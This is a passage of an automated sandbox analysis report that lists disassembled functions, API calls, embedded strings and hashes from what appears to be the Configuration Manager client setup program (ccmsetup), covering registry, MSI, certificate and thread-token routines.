                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: #$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$AlwaysExcludeUpgrade$Software\Microsoft\CCMSetup$UpdateClientUpgradeTattoo$Updated registry value %s to %d$\Ym$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess)$regKey.SetDword(c_szRegValue_UpgradeTattoo, bExcluded ? 1 : 0)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1757837785-3526482386
                                                                                          • Opcode ID: 06e22cb8c7d802cc8baf9e170b61eeffdae8fb16a0ed198d69aa2e1207044e80
                                                                                          • Instruction ID: b4870310aec306df2015fce1a2a52bb844bce81ce2b3af84d7ed12f7b098195e
                                                                                          • Opcode Fuzzy Hash: 06e22cb8c7d802cc8baf9e170b61eeffdae8fb16a0ed198d69aa2e1207044e80
                                                                                          • Instruction Fuzzy Hash: 8C312571D40349AADB00EBE0C80ABEE7EB6BF55710F548446F501BB382C7B45A05C7A5
                                                                                          Function 00604038 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 102timethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0060403F
                                                                                          • FileTimeToLocalFileTime.KERNEL32(00000000,?,CCM::Utility::Time::Time,00000048,005B6D8B,?,000000FF,?,?,?,?,?,?,?,?,?), ref: 00604074
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0060407E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006040B3
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006040EC
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006040F6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060412B
                                                                                          • __CxxThrowException@8.LIBCMT ref: 006041A2
                                                                                          Strings
                                                                                          • ..\Time.cpp, xrefs: 00604137
                                                                                          • FileTimeToSystemTime(&localTime, &sysTime), xrefs: 00604121
                                                                                          • ..\Time.cpp, xrefs: 0060411B
                                                                                          • CCM::Utility::Time::Time, xrefs: 00604050
                                                                                          • ..\Time.cpp, xrefs: 006040BF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006040AE
                                                                                          • ..\Time.cpp, xrefs: 006040A3
                                                                                          • FileTimeToLocalFileTime(&fileTime, &localTime), xrefs: 006040A9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00604126
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$CurrentErrorLastThread$Exception@8H_prolog3_catch_LocalSystemThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$CCM::Utility::Time::Time$FileTimeToLocalFileTime(&fileTime, &localTime)$FileTimeToSystemTime(&localTime, &sysTime)
                                                                                          • API String ID: 3528748932-3540932715
                                                                                          • Opcode ID: 1b309134b616204caa03af688b25c2b0dad124ddc4a22f8bc1a20de073f032c0
                                                                                          • Instruction ID: 9afce279bcc6a254d27764e9787ed585d8ce59e4e678b7b1790804ba0b3c223f
                                                                                          • Opcode Fuzzy Hash: 1b309134b616204caa03af688b25c2b0dad124ddc4a22f8bc1a20de073f032c0
                                                                                          • Instruction Fuzzy Hash: 9031F3B1A81319AEDB20EBB4CA49BEEBBA9AF14710F148155FA41F32C1DB745904C7B1
                                                                                          Function 005EF37E Relevance: 29.8, APIs: 4, Strings: 13, Instructions: 89threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005EF385
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005EF3D3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005EF449
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005EF493
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\utils.cpp$..\utils.cpp$..\utils.cpp$..\utils.cpp$..\utils.cpp$..\utils.cpp$0 != hRequest$CCMHttpGetResponseStatus(hRequest, &dwStatusCode, sStatusText)$CheckResponseStatus$dwStatusCode>=200 && dwStatusCode<=299
                                                                                          • API String ID: 3454896115-2804189796
                                                                                          • Opcode ID: 9755bbbe3ac901de96961ff36efa3fdb637e2688005a97c79d4bbc4532126b95
                                                                                          • Instruction ID: a3656f99f0557f48651dfc345f919a9d096298d32dba595f08c2b5910ba1fb17
                                                                                          • Opcode Fuzzy Hash: 9755bbbe3ac901de96961ff36efa3fdb637e2688005a97c79d4bbc4532126b95
                                                                                          • Instruction Fuzzy Hash: E121F9B16C0385FADB21AFA98C5AFEF3E24BF85B20F144115F5406B2C2CB784941C791
                                                                                          Function 005AD32C Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 253threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AD336
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AD418
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AD594
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AD58F
                                                                                          • GetPackageFeatures, xrefs: 005AD397
                                                                                          • msiutil.cpp, xrefs: 005AD59C
                                                                                          • MsiViewExecute failed with error %d for package %s, xrefs: 005AD507
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AD413
                                                                                          • msiutil.cpp, xrefs: 005AD584
                                                                                          • Find features '%s' from msi database %s, xrefs: 005AD685
                                                                                          • msiutil.cpp, xrefs: 005AD408
                                                                                          • MsiRecordGetStringW( shRecord, 1, szBuffer, &dwBufSize), xrefs: 005AD58A
                                                                                          • SELECT `Feature`.`Feature` FROM `Feature`, xrefs: 005AD45B
                                                                                          • MsiOpenDatabaseW( sPackagePath.c_str(), (LPCTSTR)0, &shDatabase), xrefs: 005AD40E
                                                                                          • MsiDatabaseOpenView failed with error %d for package %s, xrefs: 005AD4A0
                                                                                          • msiutil.cpp, xrefs: 005AD420
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Find features '%s' from msi database %s$GetPackageFeatures$MsiDatabaseOpenView failed with error %d for package %s$MsiOpenDatabaseW( sPackagePath.c_str(), (LPCTSTR)0, &shDatabase)$MsiRecordGetStringW( shRecord, 1, szBuffer, &dwBufSize)$MsiViewExecute failed with error %d for package %s$SELECT `Feature`.`Feature` FROM `Feature`$msiutil.cpp$msiutil.cpp$msiutil.cpp$msiutil.cpp
                                                                                          • API String ID: 229633481-271249321
                                                                                          • Opcode ID: bb80774888d215cf7aab4180d21941f1453866bf6f3d9da136fc6f97fd977e6e
                                                                                          • Instruction ID: 3ff9f0e952e9b4d76d497be108df0418a7c08fc087ea8a18e4311a998f16eefa
                                                                                          • Opcode Fuzzy Hash: bb80774888d215cf7aab4180d21941f1453866bf6f3d9da136fc6f97fd977e6e
                                                                                          • Instruction Fuzzy Hash: 1AA17C70801668EADF21EB65CD49BEEBFB9BF46304F0400E9E449A7292D7745E84CF61
                                                                                          Function 005B9301 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 168threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B9308
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F8FF1: __EH_prolog3_catch_GS.LIBCMT ref: 005F8FF8
                                                                                            • Part of subcall function 005F8FF1: GetCurrentThreadId.KERNEL32 ref: 005F906D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B9382
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B93FD
                                                                                          Strings
                                                                                          • util.cpp, xrefs: 005B9409
                                                                                          • util.cpp, xrefs: 005B938E
                                                                                          • LastOSVersion, xrefs: 005B9410
                                                                                          • util.cpp, xrefs: 005B93ED
                                                                                          • SOFTWARE\Microsoft\CCM, xrefs: 005B93C1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B937D
                                                                                          • util.cpp, xrefs: 005B9372
                                                                                          • OS version (%s) is not chagned., xrefs: 005B94CE
                                                                                          • shKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess), xrefs: 005B93F3
                                                                                          • IsOSVersionChanged, xrefs: 005B9337
                                                                                          • CcmGetOSMajorMinorVersion(sNewOSVersion), xrefs: 005B9378
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B93F8
                                                                                          • Detected OS version is changed from '%s' to '%s', xrefs: 005B9493
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_$Close
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmGetOSMajorMinorVersion(sNewOSVersion)$Detected OS version is changed from '%s' to '%s'$IsOSVersionChanged$LastOSVersion$OS version (%s) is not chagned.$SOFTWARE\Microsoft\CCM$shKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 3158008245-1682988320
                                                                                          • Opcode ID: 44aeae1fed12c78413e719b7776f02d787d55ea4a16043f3132cbe498a13bc40
                                                                                          • Instruction ID: 82b0d7de8741ac148b6515f10a262616c800975d6ecff0c610c2ff261a11be15
                                                                                          • Opcode Fuzzy Hash: 44aeae1fed12c78413e719b7776f02d787d55ea4a16043f3132cbe498a13bc40
                                                                                          • Instruction Fuzzy Hash: 1B51D170901349EADF10EBA4C94ABEDBFB5BF50304F244059F605772C2C7B46A49CB61
                                                                                          Function 005A419B Relevance: 28.1, APIs: 3, Strings: 13, Instructions: 139threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005A41A2
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A425D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4321
                                                                                          Strings
                                                                                          • manifest.cpp, xrefs: 005A4265
                                                                                          • Failed getting XML node for file: %s. Error 0x%x, xrefs: 005A4289
                                                                                          • Item[@FileName='%s'], xrefs: 005A41FF
                                                                                          • Discovering whether item '%s' exists., xrefs: 005A42D3
                                                                                          • manifest.cpp, xrefs: 005A424D
                                                                                          • H&l, xrefs: 005A41D4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A4258
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005A431C
                                                                                          • DetectItem(spNode, bInstalled, bNeedsRepair), xrefs: 005A4317
                                                                                          • m_spManifest.selectNode(sQuery.c_str(), &spNode), xrefs: 005A4253
                                                                                          • manifest.cpp, xrefs: 005A4311
                                                                                          • CcmSetupManifest::DetectItem, xrefs: 005A41E3
                                                                                          • manifest.cpp, xrefs: 005A4329
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3Thread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetupManifest::DetectItem$DetectItem(spNode, bInstalled, bNeedsRepair)$Discovering whether item '%s' exists.$Failed getting XML node for file: %s. Error 0x%x$H&l$Item[@FileName='%s']$m_spManifest.selectNode(sQuery.c_str(), &spNode)$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp
                                                                                          • API String ID: 1940058678-3707825056
                                                                                          • Opcode ID: 0ca0977a6b2fb67cb89e65fbf030f2a29f05e0e8983cdc727168df86327bac95
                                                                                          • Instruction ID: c3227158d8276c8d285690f97d83f6d8b274d4762cedf9188f3fa4fe3c9ac00c
                                                                                          • Opcode Fuzzy Hash: 0ca0977a6b2fb67cb89e65fbf030f2a29f05e0e8983cdc727168df86327bac95
                                                                                          • Instruction Fuzzy Hash: 2B514A71D41249AEDF11DBE4C94ABEEBFB5EF95704F144009F50477282CBB45A05CBA1
                                                                                          Function 006140F8 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 93threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006140FF
                                                                                            • Part of subcall function 005787DA: CloseHandle.KERNEL32 ref: 005787E6
                                                                                          • GetCurrentThread.KERNEL32 ref: 00614138
                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0057F21B,CcmSetup::DetermineInstallSource,000000CC), ref: 0061413F
                                                                                          • GetLastError.KERNEL32(?,?,?,?,0057F21B,CcmSetup::DetermineInstallSource,000000CC), ref: 00614149
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061417F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006141DF
                                                                                          • CloseHandle.KERNEL32(00000000,00000008,?,?,?,?,?,0057F21B,CcmSetup::DetermineInstallSource,000000CC), ref: 00614234
                                                                                          Strings
                                                                                          • ..\usertoken.cpp, xrefs: 00614187
                                                                                          • CCM::Utility::Security::GetSidStringFromCurrentThread, xrefs: 00614110
                                                                                          • OpenThreadToken(GetCurrentThread(), (0x0008) , 1, &shThread), xrefs: 00614175
                                                                                          • ..\usertoken.cpp, xrefs: 006141E7
                                                                                          • GetSIDFromToken(shThread, sUserSid), xrefs: 006141D5
                                                                                          • ..\usertoken.cpp, xrefs: 006141CF
                                                                                          • ..\usertoken.cpp, xrefs: 0061416F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061417A
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006141DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Current$CloseHandle$ErrorH_prolog3_catchLastOpenToken
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$CCM::Utility::Security::GetSidStringFromCurrentThread$GetSIDFromToken(shThread, sUserSid)$OpenThreadToken(GetCurrentThread(), (0x0008) , 1, &shThread)
                                                                                          • API String ID: 1773849950-3290042507
                                                                                          • Opcode ID: 22338353d68a3fafd774f7467acd288ab16607d2796200b12616478260c4f4e9
                                                                                          • Instruction ID: 552e0f84b185d51edc8b6bdcdcf34505ff0837ae0893c08a2a1c2d1186fb33fb
                                                                                          • Opcode Fuzzy Hash: 22338353d68a3fafd774f7467acd288ab16607d2796200b12616478260c4f4e9
                                                                                          • Instruction Fuzzy Hash: B031E4B0D80356EADF51ABB48C0EBFE7E76AF55740F188059F505B7281CA790681C7A2
                                                                                          Function 006750D1 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 73threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006750D8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00675122
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0067517C
                                                                                          • CoTaskMemFree.OLE32(00000001,CcmUtilLib::CcmFreeIPAddressInformation,00000010,006754F0,00000000,?,?,?,?,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 0067519D
                                                                                          • CoTaskMemFree.OLE32(00000000,?,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 006751AA
                                                                                          • CoTaskMemFree.OLE32(?,?,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 006751B7
                                                                                          • CoTaskMemFree.OLE32(?,CcmUtilLib::CcmFreeIPAddressInformation,00000010,006754F0,00000000,?,?,?,?,?,?,?,?,SMSSITECODE,CcmSetup::AppendAutoUpgradeInfo,000000E8), ref: 006751C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeTask$CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$0 != dwLen$0 != pInfo$CcmUtilLib::CcmFreeIPAddressInformation
                                                                                          • API String ID: 2738139261-3844193030
                                                                                          • Opcode ID: 0590c9c6577baca93e1f14e6e59e421c1f7cf2d472b3d6f6229fb45bf644fa2e
                                                                                          • Instruction ID: 9ad09ca59a187ce4adbc50bfe03c4bb5d0bc6d10b2d8c56d7c8ce6cf1a518902
                                                                                          • Opcode Fuzzy Hash: 0590c9c6577baca93e1f14e6e59e421c1f7cf2d472b3d6f6229fb45bf644fa2e
                                                                                          • Instruction Fuzzy Hash: 3821C431640245EBCF20AFA5CC0EFAD3F29EF11361F44C195B91EA7391CBB59A418791
                                                                                          Function 0058B139 Relevance: 26.5, APIs: 4, Strings: 11, Instructions: 297encryptionthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058B143
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00587752: __EH_prolog3.LIBCMT ref: 00587759
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058B471
                                                                                          • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0058B49E
                                                                                          • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0058B1D1
                                                                                            • Part of subcall function 005781EA: CertFreeCertificateContext.CRYPT32 ref: 005781F9
                                                                                          Strings
                                                                                          • GetSSLCertificateContext failed with error 0x%x, xrefs: 0058B507
                                                                                          • Locate client certificate bypassing Certificate Issuers restriction, xrefs: 0058B415
                                                                                          • Last cert queries failed. Will retry after %u seconds., xrefs: 0058B27D
                                                                                          • SSLCertificateContext: CertStore=%s, CertIssuers=%s, CertificateSelectionCriteria=%s, FirstCertificateSelection=%d, PKICertOptions, xrefs: 0058B394
                                                                                          • CcmSetup::GetSSLCertificateContext, xrefs: 0058B17D
                                                                                          • ccmsetup.cpp, xrefs: 0058B461
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058B46C
                                                                                          • ccmsetup.cpp, xrefs: 0058B47D
                                                                                          • t&k, xrefs: 0058B268
                                                                                          • CcmGetCertificateContextEx2( sStoreName, sCertIssuers, sCertSel, (BOOL)dwCertFirstFlag, dwCertFlags, &g_pClientCertContext ), xrefs: 0058B467
                                                                                          • 42k, xrefs: 0058B407
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CertCertificateContext$DuplicateH_prolog3$CurrentFreeH_prolog3_catch_Thread
